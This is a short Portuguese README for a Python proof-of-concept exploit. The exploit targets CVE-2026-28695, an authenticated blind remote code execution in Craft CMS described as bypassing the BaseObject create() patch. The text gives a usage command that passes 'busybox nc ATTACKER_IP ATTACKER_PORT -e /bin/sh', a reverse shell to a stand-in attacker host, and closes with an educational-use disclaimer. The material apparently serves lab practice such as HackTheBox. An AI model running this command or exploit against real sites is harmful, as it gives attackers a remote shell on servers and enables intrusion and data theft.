
Exploit PoC em Python para CVE-2026-28695, um RCE cego autenticado no Craft CMS que contorna o patch create() do BaseObject e gera um reverse shell.
Execução remota de código cega e autenticada no Craft CMS. Contorna a restrição create() - BaseObject adicionada na correção do CVE-2026-28695 (commit e31e508).
python3 exp.py -t http://target.htb -u user -p 'password' -c 'busybox nc ATTACKER_IP ATTACKER_PORT -e /bin/sh'
Este script destina-se apenas a fins educacionais. O autor não é responsável por qualquer uso indevido ou dano causado por este exploit. Certifique-se sempre de que tem permissão antes de testar ou explorar vulnerabilidades!